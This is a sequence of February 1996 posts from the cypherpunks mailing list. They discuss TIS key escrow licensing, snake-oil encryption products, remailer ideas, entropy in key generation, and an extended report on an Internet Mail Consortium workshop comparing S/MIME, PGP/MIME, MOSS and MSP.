>Brad Biddle, Legal Intern <biddle@acusd.edu>
>Privacy Rights Clearinghouse, Ctr for Public Interest Law
>http://pwa.acusd.edu/~prc
>
>[The views expressed in this article are not necessarily those of the 
>Privacy Rights Clearinghouse or the Center for Public Interest Law.]

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 23 Feb 1996 04:28:22 +0800
To: cypherpunks@toad.com
Subject: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <ad5201ed18021004349b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


In my last message I wrote:

---
....
statements I read. (The TIS statement points out that: "Separate licensing
arrangements are necessary for organizations desiring Data Recovery
Center ownership.", so there is the chance that if I want Grandma to be my
spare key holder she might have to pay bucks to TIS and pass their
scrutiny...if so, not a very nice option, and one which could turn even CKR
into BB-Enabled software with a change in DRC policies...see point below.)
....
---

Well, I've been looking at the DRC licensing steps, and it makes it clear
that becoming a DRC is an expensive proposition:

"A DRC technology license is priced at $30,000 for the first DRC, and
$10,000 for each additional DRC to the same customer. A mandatory secure
DRC computer system is available for $20,000 for each DRC location, plus an
annual maintenance fee of $10,000 for the first DRC and $5,000 for
each additional DRC. In addition, a royalty is charged against DRC service
fees at the rate of 10% of the revenue stream."

Not so expensive for a bank or other such business, but not something Mom
and Pop will be getting into anytime soon!

Also, it's clear to me that a DRC located in the United States is subject
to court orders and subpoenas to release keys (there is no "protection
against self-incrimination" in such cases, as the DRC is not in danger of
being incriminated....there _may_ be attorney-client privilege, depending
on whether the DRC is one's lawyer....lots of legal issues to explore).

And it's not clear from the documents if TIS (or the government) will
license/approve DRCs located in offshore locations, such as Anguilla or
Switzerland. (I don't mean for CKE use, and with CKE strength, I mean DRCs
for U.S. users of CKR.)

(Depends on what channel the DRCs use to communicate with U.S. operations,
doesn't it? If the Anguilla-based DRC must use CKE itself, then the
stronger CKR is only as strong as the weaker CKE used in the offshore
operation! Cache-22.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Fri, 23 Feb 1996 02:33:30 +0800
To: cypherpunks@toad.com
Subject: CDA: DoJ's Brief opposing TRO
Message-ID: <9602221754.AA14686@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


  A copy of the government's brief opposing the TRO has been posted at the
following site:
http://www.law.miami.edu/~froomkin/seminar/ACLU-Reno-TRO-Justice-brief.htm

Regards -
Lynne



*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 23 Feb 1996 07:42:27 +0800
To: cypherpunks@toad.com
Subject: Re: url
Message-ID: <199602222059.MAA07863@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:52 PM 2/22/96 -0500, Perry E. Metzger wrote:
>Mike McNally writes:
>> At <URL:http://www.osf.org/~loverso/javascript/track-me.html> find
>> some interesting "surveillance" applications of Javascript.
>
>Okay. We have some netscape people here on this list.
>
>When is the patch to let you disable JavaScript inside Netscape going
>to go out? Its more than time.

Why Perry, it's called Netscape 1.1N.  :-)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 23 Feb 1996 14:57:02 +0800
To: karlmarx@illumini.demon.co.uk
Subject: Re: A Challenge (perhaps!)
Message-ID: <199602222131.NAA21573@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:39 PM 2/21/96 GMT, karlmarx@illumini.demon.co.uk wrote:

>My friend has just written a new crypto program that he is trying to get
>included on a PC Magazine CD-ROM over here... 
>I don't know too much about it at the moment, but he said he thought it
>would be a good idea to see if anyone on this list could crack it and thus
>help to make it more secure. I don't know too much about it ATM...

Great - we'd be happy to see it here.  Bad code is still code :-)
If it's good crypto, or even bad crypto with a good user interface,
it may be useful to people.  If it's bad crypto, we may be able to
educate your friend on plugging in good algorithms or at least discourage
having bad crypto made available to people who might be hurt by trusting it.


>I know it doesn't exercise key technology and relies on the secrecy of the
>algorithm (which from my very limited knowledge on cryptography I think makes
>it almost doomed from the start (?))

If you're going to distribute even executables, people can figure out
the algorithm you're using; keeping keys secret is tough enough...
Also, if you've got an algorithm that's strong enough to be useful,
you can do mathematical analysis of how long it takes to break,
and get an idea of how secure your data will be.

>The application is written in Visual Basic and I could probably get a copy
>of the compiled (well VB is actually interpreted, but that's neither here or
>there) .EXE file....

VB is readable, more or less, and I suspect if there's anything useful
from your friend's code, it'll be the user interface (because even someone
who can't do the math to do decent cryptography may still have some
taste about what user interfaces are friendly.)  From a tool-builder's
perspective, it's better to have tools that can be used as components
of larger systems than tools that _require_ a GUI interface or a
clumsy command-line interface, but that won't stop us from stealing a good
GUI :-)
and throwing away the bogus crypto.  Besides, PGP's user interface is
far clumsier than a command-line interface needs to be.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281

! Frank Zappa for President !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Fri, 23 Feb 1996 07:38:44 +0800
To: John Young <jya@pipeline.com>
Subject: Re: IBM Breakthrough?
In-Reply-To: <199602221351.IAA14781@pipe2.nyc.pipeline.com>
Message-ID: <312CD36B.1A8B@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Does this IBM breakthough mean they can go back in time and not hire 
Bill Gates to do DOS?





-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEIa2wAAAEEALouE7MNxsG+QTOJSrMTygYWKblpI9MgOKaFA+5AICNelAw6
6Gj3B0EQr7bwLILk8EJULG+kYh/ND9Kn1EXBK+elXbwpFCLqoyEZrbHJnurhH/t6
VFEwhbN1V0e/bFOCTq8nykoJjZ/uq0mz8HouIbEt6BYWoKVSUIU/T+iDV3TVABEB
AAG0DWdoa0Bzb3BoaS5jb20=
=gwax
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 23 Feb 1996 04:57:23 +0800
To: cypherpunks@toad.com
Subject: url
Message-ID: <9602221938.AA17154@alpha>
MIME-Version: 1.0
Content-Type: text/plain



At <URL:http://www.osf.org/~loverso/javascript/track-me.html> find
some interesting "surveillance" applications of Javascript.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Fri, 23 Feb 1996 10:24:54 +0800
To: cypherpunks@toad.com
Subject: Analysis wanted
Message-ID: <2.2.32.19960222214441.006945b8@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


If anyone is interested in helping out the gentleman quoted below by
ruthlessly savaging :-) his algorithm and assumptions, would you please
e-mail me so I can hook you up with him? (He decided not to post to the list
directly to avoid the usual signal-to-noise problems. Can't blame him. But I
offered to forward along relevant info and queries.)

>Is there a way of someone trustworthy to try and break VGP and express an
>opinion on it's strength or weakness.  I can basically describe the
>encryption approach and the reencryption, number of passes, final conversion
>to clean text from a binary etc. with you to try to give you some level of
>comfort without sharing the code.  I would also like to have someone
>competent run it through the paces, and then if it is not worthy, go back to
>the drawing board.
>
>In short, I appreciate your comments and frankness, and assure you I am
>interested in your opinion or anyones opinion, and interested in making the
>system rugged.  I agree with your point, and perhaps it sums the whole issue
>up in one line, and that is that "bad encryption is worse than no
>encryption".  encouraging a false sense of security is not something I want
>to be part of, I do want to be responsible to others.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 23 Feb 1996 05:18:05 +0800
To: cypherpunks@toad.com
Subject: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <199602221950.OAA27083@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   To supplement TIS's Web site information on CKE, here's a
   mailing from Steve Walker earlier this month:


   TRUSTED INFORMATION SYSTEMS, INC.

   February 2, 1996


   There has been amazing progress on TIS's Commercial Key
   Escrow (CKE) initiative since my last status report.

   In November, we submitted a Commodity Jurisdiction (CJ)
   request to the U.S. Department of State for our Gauntlet
   Internet Firewall Product with CKE-based IP Encryption,
   which constitutes our Global Virtual Private Network (GVPN)
   system (see figure 1). Our Gauntlet system has had a
   Virtual Private Network (VPN) capability using the Data
   Encryption Standard (DES) algorithm to encrypt
   firewall-to-firewall communications for the past year. But
   because of U.S. export controls, we have not been able to
   sell this option outside of the U.S. and Canada. By adding
   CKE technology to our firewalls, the Gauntlet system with
   DES and CKE now meets the U.S. government requirements for
   export to most parts of the world.

   In the course of several meetings with U.S. government
   representatives. we were told that it will take a while
   longer for all the details of the CJ process to be worked
   out, but that the U.S. government was willing to consider
   a temporary (up to 4-year) export license until the CJ
   process is in place. In early December, we submitted such
   a request and on January 19, 1996, it was approved (see
   figure 2).

   While this temporary export license has limitations (there
   must be a Data Recovey Center in the U.S. as well as in the
   foreign country because reciprocal agreements do not yet
   exist between the U.S. and foreign governments), it
   represents the first export approval of a DES-based key
   escrow encryption system, a small step but a giant leap
   toward full exportability of good cryptography when
   equipped with user-controlled key recovery. We are now
   discussing Global Virtual Private Networks, based on our
   Gauntlet-CKE system, with several multinational companies.

   In December, I attended a special meeting of the
   Organization for Economic Cooperation and Development
   (OECD) in Paris to discuss the international ramifications
   of the U.S. key escrow initiative. The consensus of the
   meeting was that user-controlled key escrow provides the
   only workable solution to the long-standing dilemma between
   the private sector's need for encryption protection and
   governments' needs to be able to decrypt the communications
   of criminals, terrorists, and other adversaries. Other
   meetings will follow, but it appears that most major
   governments endorse the U.S. government's user-controlled
   key escrow initiative as the only practical way through the
   cryptography maze.

   In mid-January, Microsoft announced its long-awaited
   Cryptographic Application Programming Interface (CAPI).
   This development promises to finally provide a well-defined
   separation between applications calling on cryptography and
   the actual performance of the cryptography. Now users will
   be able to request cryptographic functions in hundreds of
   applications and select precisely which cryptography to use
   at the time of program execution rather than program
   purchase. Cryptographic Service Providers (CSPs) can now
   evolve independent of applications, and users can choose
   whatever cryptography is available wherever they are in the
   world. TIS is working closely with CSP vendors to ensure
   that CSPs with good cryptography are available in domestic
   and exportable versions as soon as possible based on the
   U.S. government's key escrow initiative.

   In a presentation at the recent RSA Conference, I tried to
   put all this in perspective by conducting a "thought
   experiment" (see attachment 3).

   +  Suppose the U.S. government had never thought of placing
      export controls on cryptography...

      We would now have widespread use of encryption, both
      domestically and worldwide; we would be in a state of
      "Utopia," with widespread availability of cryptography
      with unlimited key lengths. But, once in this state, we
      will face situations where we need a file that had been
      encrypted by an associate who is unavailable (illness,
      traffic jam, or change of jobs). We will then realize
      that we must have some systematic way to recover our
      encrypted information when the keys are unavailable.

      When we add a user-controlled key recovery capability to
      our Utopia, we find ourselves in an "Ultimate Utopia,"
      with unlimited key length cryptography, widely available
      through mass market applications, and user-controlled
      key recovery.

   +  But, unfortunately, the U.S. government *did* think of
      cryptographic export controls. And over the past several
      years, we have been frustrated by repeated unsuccessful
      attempts to resolve this dilemma...

      In 1992, the U.S. government allowed the export of
      40-bit keys, a solution so weak no one wanted it.

      In 1993, the U.S. government announced Clipper, an
      attempt to give users good cryptography while preserving
      the U.S. government's prerogatives. But almost everyone
      hated U.S. Government-controlled key escrow, including
      most foreign governments.

      In 1994, industry rebelled with the proposed Cantwell
      legislative initiative to remove cryptography from U.S.
      State Department control. And, behind the scenes, the
      U.S. government orchestrated a massive counterattack.
      The result: a study that acknowledged the widespread
      availability of foreign cryptography yet proposed no
      change in U.S. government policies on cryptographic
      exports.

   +  Then in 1995, the U.S. government announced its key
      escrow initiative: allow the export of up to 64-bit
      cryptography (a remarkable concession) when accompanied
      by an acceptable form of user-controlled key escrow
      (critical component to this policy being that "an
      acceptable escrow system" must have sufficient integrity
      to give the government confidence that, with a warrant,
      the keys will be available.)...

      Some in the computer industry labeled this just another
      form of Clipper and vowed to continue the fight against
      U.S. government regulation of encryption in any form -- 
      presumably forever. On the other hand, once the new
      escrowed encryption policy was announced, U.S.
      government agencies -- the FBI, NSA, White House, DoD,
      DoJ, NIST, and NSC -- closed ranks behind it and have
      shown little interest in discussing any other
      approaches. In addition, neither political party has
      shown any interest in taking up the argument in the
      Congress, probably because it is a complex issue and
      there is no obvious "winning" position. But, depending
      upon how the definition of user-controlled key escrow is
      resolved, the new escrow policy could just be the
      long-sought compromise between government and industry
      that gets us through this morass.

   +  If we can ensure that organizations can control the
      security of backup access to their encrypted information
      through well-designed commercial key recovery systems --
      yet also ensure that governments have access when
      justified via normal legal procedures -- we may have
      truly found the "Ultimate Utopia" solution to a dilemma
      that has existed all of our professional lives and
      threatens to continue through the next generation...

   Thus, in my thought experiment I have come to the
   conclusion that we (industry and government) are all
   heading towards the same objective, but on a different path
   from what some of us originally wanted. Yet, to my way of
   thinking, that path has to accomodate us all if we are ever
   to arrive at any mutually agreeable destination. When one
   group of participants raises insurmountable barriers for
   another group, it simply blocks everyone from progressing
   down any path, and the net result is that U.S. industry is
   not able to export any good crypto-based security.

   We at TIS are dedicated to finding a solution acceptable to
   all sides. We ask your help in this struggle. If you want
   exportable cryptography routinely available in your
   lifetime and believe that user-controlled key recovery is
   an important, if not vital, capability, please contact us
   at <cke@tis.com>. If you want to integrate exportable CKE
   into your product line, we are ready to help. If you want
   to buy internationally deployable good cryptography with
   your favorite applications, tell your application vendor
   you want escrow-enabled applications.

   We all have an opportunity to make a major difference here.
   The opportunity is ours to take or forgo. Help us make this
   happen. Visit our www site, at http://www.tis.com/, and
   learn more about this vital initiative.

   Sincerely,
   Stephen T. Walker

   Attachments:

   1. Global Virtual Private networks with CKE/Gauntlet
      transaction security diagram.

   2. CJ Application for "Escrow-enabled Gauntlet Firewall
      Model 3.2 with Gauntlet Data Recovery Center."

   3. Diagram of cryptography evolution from 1992 to 1995,
      with Yesterday, Today, "Utopia" and "Ultimate Utopia."

   -----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 23 Feb 1996 05:17:39 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Search engines: query on queries
Message-ID: <Pine.SUN.3.91.960222144931.4310C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have seen occasional references to various reports on what kinds of 
queries are submitted to Altavista and other search engines.  Can anyone 
point me to an authoritative report?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 23 Feb 1996 05:21:47 +0800
To: cypherpunks@toad.com
Subject: Re: url
In-Reply-To: <9602221938.AA17154@alpha>
Message-ID: <199602221952.OAA22697@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally writes:
> At <URL:http://www.osf.org/~loverso/javascript/track-me.html> find
> some interesting "surveillance" applications of Javascript.

Okay. We have some netscape people here on this list.

When is the patch to let you disable JavaScript inside Netscape going
to go out? Its more than time.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 23 Feb 1996 08:55:25 +0800
To: cypherpunks@toad.com
Subject: Let the Snake Oil Flow
Message-ID: <ad5232581a02100494c9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



There have been several purveyors of (potential) snake oil here.
Predictably, critics have been drawn into "trying to break" these allegedly
strong systems. Some of the purveyors are even saying things like
[paraphrased, but with charming misspellings emulated]:

"See, even the smarty-pants Cyphurpunks are unabble to brake ouir system!
Our virtuel one-time pad, which converts 10 randumly picked bits into 1000
or 10,000 or even a bazillion!, by our patented processo of "entropy
enhancemate," has defeated even immacarthy and metzger. Our system rulez!"

And so it goes....

Predictably, others are asking/expecting "the Cypherpunks" to break their
systems. Just as predictably, many of us are patiently (and impatiently)
explaining that breakages cost money and resources. And so the "developers"
gleefully respond that this proves the "Cyperpunks" [sic] are helpless
before their software.

Well, it seems to me that letting some real snake oil out there could be a
Good Thing. Being the Neo-Calvinist Darwinist that I am, I set that anyone
who puts valuable information into "PowerPads" and "Stream-of-Consciousness
Ciphers" pretty much deserves what he or she gets. I am not losing any
sleep that Snake Oil Enterprises is hyping a conceptually flawed system.

A few highly publicized failures could be educational, and ultimately help
to strengthen the Net. You don't get better bridges without some
highly-visible bridge collapses. Raises consumer awareness of what good
design really is.

Personally, I'm much more worried about the behind-the-scenes goings on
with key escrow, the pressures being applied to Netscape, Lotus, Microsoft,
TIS, etc., than I am in Yet Another Clueless Crypto Product (tm).

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 23 Feb 1996 07:42:27 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Signature Legislation
Message-ID: <01I1IR12398SAKTL4K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I find it interesting to note that Dr. Biddle's concerns on the
economic aspects of the legislation are almost the reverse of those on the
cypherpunks list. For instance, he is concerned about too much liability by
the consumer (and I would agree that the "strict liability" rather than
"negligence" model is a problem). The concern on the list has been that there
is too much liability for the CA, given the potential of unlimited liability
for all transactions such as Dr. Biddle appears to be favoring.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 23 Feb 1996 08:03:07 +0800
To: fletch@ain.bls.com
Subject: Re: Public Access Obsolete. Capitalism offers free email
Message-ID: <01I1IRFBEE2UAKTL4K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"fletch@ain.bls.com"  "Mike Fletcher" 22-FEB-1996 03:53:16.20

>	Who says the code has to run on their machine.  Just forward
>all incoming mail off to another box, and send all the outgoing mail out
>from the free account.  Depending of course on whether it's some sort
>of shell account or if you POP/SMTP to their box.

	I'd guess it's some sort of dialin (possibly via tymnet or some such).
In that case, you'd simply have your remailer on your system at home, calling
the system up at some (probably randomly determined) time and downloading the
incoming mail and uploading whatever outgoing mail that (given latency) you
wanted to go out at that point. (Any on-encrypted email, such as their ads,
you'd be able to filter out very easily). You could even potentially run it
off of a portable computer. For unattended running, the hardware RNG would be
best, of course.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sat, 24 Feb 1996 16:18:31 +0800
To: resolving-security@imc.org
Subject: No Subject
Message-ID: <199602230055.QAA15846@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


   Here follow one cypherpunk's impressions of the Internet Mail
Consortium's Security Workshop
(http://www.imc.org/security-workshop.html) on Wednedsday 21 Feb 1996.
Since there will be official notes of the proceedings, I felt I had a
little more scope to convey mood and feelings rather than dry
technical facts. After all, I think the buzz will do more to determine
what gets deployed than the technical merits.
   This document is available on the Web at:
      http://www.c2.org/~raph/report.html


The setting
-----------

   Paul Hoffmann and Dave Crocker recently started the Internet Mail
Consortium (http://www.imc.org). This workshop was its first major
activity. Dave Crocker moderated the event, skillfully herding almost
70 secure email proponents and representatives from user communities
through a very tough subject.
   The title of the workshop was "Resolving email security," but there
was no real expectation that the issues would be resolved that day.
What was expected (and what happened) is that people would get a
better understanding of why secure email hasn't happened yet, what
kinds of things could be done to make it happen. More impressively,
there was "room consensus" for a few _very_ positive steps, about
which more later.
   One of the goals of the IMC is to involve users, not just
developers. I was ready to "officially" represent the "cypherpunk user
community," but fortunately, I didn't need to. In fact, the strongest
advocacy of strong crypto came from an employee of a "large service
provider in America." Overall, I felt that the user communities were
pretty well represented, and all important technical points got made.


MOSS is dead, long live MOSS
----------------------------

   There were five contenders on the field going into the day, and two
and a half at the end. MOSS was one of the casualties. A lot of us
were sorry to see it go, but eliminating candidates has got to happen
if we're going to have interoperation.
   It's hard to say exactly what went wrong. MOSS had many advantages,
and was a nice, clean, pretty standard. I think what doomed it was the
lack of a good implementation.
   Even though MOSS is no longer considered a serious contender, one
piece of it is still very much alive: the multipart/signed message
format. At the end of the day, there was strong, nearly unanimous
consensus that multipart/signed should be recommended as the signed
message format for _all_ of the email encryption protocols.


S/MIME: you can dance to it
---------------------------

   There was a lot of energy around S/MIME. People are implementing
it. Internally, it's pretty kludgely, but it does provide pretty good
cryptographic services. (as an aside, my favorite kludge anecdote is
the fact that X.509 certificates use an IA5 character set rather than
ASCII, so that the @ in email addresses has to be represented as (a)
instead).
   The main thing people didn't like about the existing S/MIME spec is
the signed message format. In the existing spec, you've got a choice
between a message unreadable to non-S/MIME-aware clients, or
duplicating the data. Neither alternative is very palatable.
   Apparently, though, a new version of the S/MIME spec _will_
incorporate the multipart/signed format of RFC 1847. This made almost
everybody happy, although I'm sure all those S/MIME developers are a
bit unhappy with the spec changing, and having to reimplement stuff.
   The biggest problem with S/MIME is that the signed and encrypted
format reveals who made the signatures. Obviously, this has severe
consequences for anonymous mail. Believe it or not, a lot of people
care. For example, the car manufacturers do not wish to broadcast the
email addresses of their employees over the net.
   One technical workaround is to do it the MOSS way - first, sign the
message, resulting in an intermediate S/MIME message, then encrypt
that into a second S/MIME message. I'd recommend that implementors
make provisions for such recursive formats; I think it's likely that
we'll see a lot of these on the Net.


PGP: troubled, but still alive
------------------------------

   The consensus was that S/MIME and PGP/MIME are the two viable email
encryption protocols. Thus, PGP is still very much alive and kicking.
   PGP's fabulous strength is that it won't let you down
cryptographically. That simply cannot be said for the other
contenders.
   That said, much about the PGP effort troubles me. Perhaps the
biggest problem is that there just aren't enough people working on it.
>From what I understand, it's pretty much just Derek and Colin, and
there's a _lot_ of work to do. I said before that I didn't think the
public PGP/MIME release will happen until this fall, and I see no
reason to change my estimate. By that time, a lot of S/MIME
implementations will already be deployed.
   One strength of PGP has traditionally been its unity. PGP means one
message format (the PGP one), one suite of crypto algorithms (the PGP
one), one key format (the PGP one), one application (PGP itself). Most
of the other proposals are modular in some way, especially with
respect to algorithms. PGP is moving in that direction.
   The most visible evidence of that is the way PGP/MIME is being
done. The prevailing philosophy of the PGP people is that the PGP
application itself should not decode MIME formats - that should be the
job of a separate application. It seems to me that this is going
against the tradition, though. In the past, if you got a PGP message,
you just ran it through PGP. Now you won't be able to do that.
   Also, the existing data formats (while pretty good) are going to
get changed. The algorithms are going to "go modular" (although I
don't think we'll be seeing a Fortezza implementation any time soon).
This is going to cause a lot of pain for the installed base. Will it
be worth it? We'll just have to see.


MSP: not as bad as you think
----------------------------

   Earlier, I mentioned that two and a half protocols survived the
day. The remaining one is MSP. It's actually not a bad protocol. It
has two features that none of the others have: the ability to label
classified messages, and a cryptographically strong signed receipt.
Both of these functions are highly important for government users. It
looks like government suppliers are going to go ahead and implement
it, and the government is going to use it.
   MSP has been around a while, but the effort to turn it into a
serious alternative for general Internet use is quite new. Two specs
got published this month: a MIME integration spec (sharing the same
problems as the old S/MIME), and a spec for plugging in the RSA
algorithm suite. With these specs in place, MSP would not be
fundamentally that different than, say, S/MIME.
   My feeling is that the main differences are cultural. MSP still has
a very ASN.1, OSI, governmental flavor. Its proponents are making the
effort to be responsive to users, but I think there's still a bit of
skepticism about that, perhaps misguided, perhaps not.
   It was announced that there will be a free reference implementation
of MSP, available to US citizens.


My kingdom for 40 bits
----------------------

   I've been thinking about the 40 bit thing a lot. It makes me very
uncomfortable. From the cypherpunk perspective, this should be nothing
new or remarkable, but keep in mind that there's a _lot_ of pressure
on companies to be able to make money in overseas markets.

   In one of the "modular algorithms" designs, it's not easy to figure
out which algorithms your recipient can understand. Guess wrong, and
your message goes out with 40-bit encryption. In my opinion, this is
worse than no encryption at all, because it gives the false sense of
security. Building such a failure mode into an email encryption
protocol strikes me as a bad idea.

   This is my subjective impression, but I sensed that there was a
collective delusion that US software developers would actually be able
to sell a 40-bit product overseas. Certainly, Netscape has proved that
it is possible, but then again, encryption is peripheral to the value
of their product. You'd still be using Netscape even if it had no
encryption at all, wouldn't you? How many https: URL's are even in
your history.db file? For a "secure email" product, it's a different
story.

   There were a few other things that led me to the conclusion of a
40-bit delusion. First, people still seemed to thing that the
cypherpunk 40-bit cracks were a concerted effort by highly expert
people, rather than the weekend hacks that could be duplicated by any
competent sysadmin or grad student. I don't think the message really
got through. If 40-bit email gets deployed, we need to make a few more
high-profile cracks just to hammer it in.
   Finally, there's an almost religious belief that making the choice
of algorithms indepenent of the encryption protocol will somehow solve
the problem. From the point of view of the user, this is just not
true. What the user selects is an encryption protocol, an algorithm
suite, and whatever other parts of the spec were left open. What the
user selects doesn't have any modularity in it at all. It's either a
good protocol or a bad one.

   Maybe customers today think that 40-bit encryption offers some
value, but I think they'll soon be disillusioned. This is something
that cypherpunks can have a role in. In the medium to long term, it
will become clear that 40-bit encryption offers no benefits, and in
fact is dangerous.
   My advice to US developers: don't even try to export a 40-bit
version of your product. Just leave crypto out of the export version.
Your product will have better performance and many fewer configuration
problems. Include 40-bit in the US product if you have to, but don't
allow it to be used silently. For example, put up a little dialog that
says, "are you _sure_ you want to use 40-bit encryption? It's not
secure, you know."
   If care about offering crypto in the non-US market, form a
partnership with overseas developers to add the crypto.

   Non-US developers, now is a fabulous opportunity. Get those
implementations underway, the sooner the better.


Coexistence
-----------

   Since there is no one single standard that everyone feels
comfortable with, we will somehow have to deal with the coexistence of
multiple conflicting protocols. Fortunately, this is something the Net
is good at.
   Most serious email vendors plan to "implement everything that's
real." That means S/MIME for sure, PGP/MIME assuming they can get
their hands on a decent implementation, and MSP if they sell a lot of
stuff to the government.
   If everyone follows this path, then we really will have
interoperable secure email. Perhaps over the long term, one of the
standards would come to dominate, perhaps not.
   I know that the deployment of secure email has been a year away for
the past decade or so, but now I think it really is poised to happen.
The implementation effort is very much real. Over the next few months,
we will see some very high profile, mass market implementations.
   Before that happens, though, the protocols must actually become
stable. It's a characteristic of _all_ of the viable protocols that
they're still in flux, still in the process of being defined. But at
least the direction is clear, largely as a result of feedback from
this workshop.


Consensus
---------

   At the end of the meeting, Dave asked the room for consensus on
several points. First, there was strong consensus that the encryption
protocols converge on multipart/security for their signed message
format. Second, it was agreed that the proponents of the surviving
schemes get together to list their differences, justify these
difference, and commonalize things that don't _need_ to be different,
also agreeing on a timetable concluding at the Montreal IETF meeting.
   I'd say that's quite a remarkable achievement for a such a
difficult area.

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 24 Feb 1996 17:07:20 +0800
To: m5@dev.tivoli.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <01I1IRX0E278AKTL4K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"m5@dev.tivoli.com" 22-FEB-1996 11:47:13.40

>Perry E. Metzger writes:
> > If you start with 100 bits of entropy, your stream will have only 100
> > bits of entropy. If you start with 1024 bits, you will have a kilobit
> > of entropy, and so forth.
> > 
> > This may seem like a lot, but it really isn't.

	I'm an almost complete novice at cryptography, and even I know that
Perry is completely correct in this. Look at it this way. You've got a computer
algorithm doing something or another. Given the two pieces of information
(the entropy) of the initial somewhat random number and the number of
iterations, it will produce _one_ and _only one_ number out the end. Now, if
you have a high-quality PRNG (that's what this is), it will be very hard to
predict what set of numbers will turn out just from knowing the algorithm, but
you're still not adding to the number of possibilities from your initial
random number.

>...and note that IPG does us the favor of ensuring the keys conform to
>this elaborate battery of statistical tests.  Thus, there are bunches
